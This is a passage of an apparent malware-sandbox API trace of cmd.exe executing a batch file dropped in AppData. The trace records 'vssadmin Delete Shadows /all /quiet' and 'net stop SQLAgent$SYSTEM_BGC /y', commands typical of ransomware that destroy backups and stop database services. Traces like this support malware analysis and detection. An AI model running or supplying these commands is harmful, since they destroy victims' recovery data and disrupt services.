dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0036.733] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4038 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.733] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.734] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0036.734] GetProcessHeap () returned 0x3e0000 [0036.734] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4038 | out: hHeap=0x3e0000) returned 1 [0036.734] GetProcessHeap () returned 0x3e0000 [0036.734] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0036.734] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.734] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin Delete Shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin Delete Shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin Delete Shadows /all /quiet", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb18, dwThreadId=0xb1c)) returned 1 [0036.739] CloseHandle (hObject=0x78) returned 1 [0036.739] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.739] GetProcessHeap () returned 0x3e0000 [0036.739] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.739] GetEnvironmentStringsW () returned 0x3f8408* [0036.739] GetProcessHeap () returned 0x3e0000 [0036.739] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.739] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.739] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0036.852] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0036.852] CloseHandle (hObject=0x74) returned 1 [0036.852] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0036.852] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0036.852] GetProcessHeap () returned 0x3e0000 [0036.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.852] GetEnvironmentStringsW () returned 0x3f8408* [0036.852] GetProcessHeap () returned 0x3e0000 [0036.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.852] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.852] GetProcessHeap () returned 0x3e0000 [0036.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.852] GetEnvironmentStringsW () returned 0x3f8408* [0036.852] GetProcessHeap () returned 0x3e0000 [0036.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.852] GetProcessHeap () returned 0x3e0000 [0036.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0036.852] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0036.852] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.852] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.852] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.853] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.853] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.853] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.853] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.853] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.853] SetConsoleInputExeNameW () returned 0x1 [0036.853] GetConsoleOutputCP () returned 0x1b5 [0036.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.854] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0036.854] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.854] SetFilePointer (in: hFile=0x74, lDistanceToMove=906, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38a [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7498 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7368 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7240 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71d0 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0036.854] GetProcessHeap () returned 0x3e0000 [0036.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0036.854] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.855] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38a [0036.855] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1537, lpOverlapped=0x0) returned 1 [0036.855] SetFilePointer (in: hFile=0x74, lDistanceToMove=939, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ab [0036.855] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$SYSTEM_BGC /y\r\net\r\ncy ignoreallfailures\r\nnded\r\n") returned 33 [0036.855] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.855] GetFileType (hFile=0x74) returned 0x1 [0036.855] _get_osfhandle (_FileHandle=3) returned 0x74 [0036.855] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ab [0036.855] GetProcessHeap () returned 0x3e0000 [0036.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0036.855] GetProcessHeap () returned 0x3e0000 [0036.855] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0036.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0036.855] GetProcessHeap () returned 0x3e0000 [0036.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0036.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x42) returned 0x3f3ff0 [0036.855] _tell (_FileHandle=3) returned 939 [0036.855] _close (_FileHandle=3) returned 0 [0036.856] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0036.856] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0036.856] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0036.856] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0036.856] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0036.856] _wcsicmp (_String1="net", _String2="CD") returned 11 [0036.856] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0036.856] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0036.856] _wcsicmp (_String1="net", _String2="REN") returned -4 [0036.856] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0036.856] _wcsicmp (_String1="net", _String2="SET") returned -5 [0036.856] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0036.856] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0036.856] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0036.856] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0036.856] _wcsicmp (_String1="net", _String2="MD") returned 1 [0036.856] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0036.856] _wcsicmp (_String1="net", _String2="RD") returned -4 [0036.856] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0036.856] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0036.856] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0036.856] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0036.856] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0036.856] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0036.856] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0036.856] _wcsicmp (_String1="net", _String2="VER") returned -8 [0036.856] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0036.856] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0036.856] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0036.856] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0036.856] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0036.856] _wcsicmp (_String1="net", _String2="START") returned -5 [0036.856] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0036.856] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0036.857] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0036.857] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0036.857] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0036.857] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0036.857] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0036.857] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0036.857] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0036.857] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0036.857] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0036.857] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0036.857] SetErrorMode (uMode=0x0) returned 0x1 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0036.857] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.857] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d58 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e80 [0036.857] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e80, Size=0x122) returned 0x3f6e80 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e80) returned 0x122 [0036.857] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0036.857] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0036.857] GetProcessHeap () returned 0x3e0000 [0036.857] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0036.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.858] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.858] GetLastError () returned 0x2 [0036.858] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.858] GetLastError () returned 0x2 [0036.858] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.858] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.859] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.859] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0036.859] GetLastError () returned 0x2 [0036.859] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0036.860] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0036.860] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.860] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.860] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb0 [0036.860] GetProcessHeap () returned 0x3e0000 [0036.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4a) returned 0x3f8278 [0036.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71c8 [0036.860] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d0, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0036.860] SetErrorMode (uMode=0x0) returned 0x1 [0036.860] GetProcessHeap () returned 0x3e0000 [0036.860] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71c8, Size=0x5c) returned 0x3f71c8 [0036.860] GetProcessHeap () returned 0x3e0000 [0036.860] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71c8) returned 0x5c [0036.860] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.860] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.860] GetProcessHeap () returned 0x3e0000 [0036.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7230 [0036.860] GetProcessHeap () returned 0x3e0000 [0036.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7358 [0036.860] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7358, Size=0x122) returned 0x3f7358 [0036.860] GetProcessHeap () returned 0x3e0000 [0036.860] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7358) returned 0x122 [0036.860] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.861] GetProcessHeap () returned 0x3e0000 [0036.861] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7488 [0036.861] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7488, Size=0x76) returned 0x3f7488 [0036.861] GetProcessHeap () returned 0x3e0000 [0036.861] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7488) returned 0x76 [0036.861] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.861] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.861] GetLastError () returned 0x2 [0036.861] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.861] GetLastError () returned 0x2 [0036.861] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.861] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0036.861] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0036.861] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0036.861] GetLastError () returned 0x2 [0036.861] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0036.862] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0036.862] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.862] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.862] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.862] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0036.862] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0036.862] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0036.862] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4040 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.862] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.862] _wcsnicmp 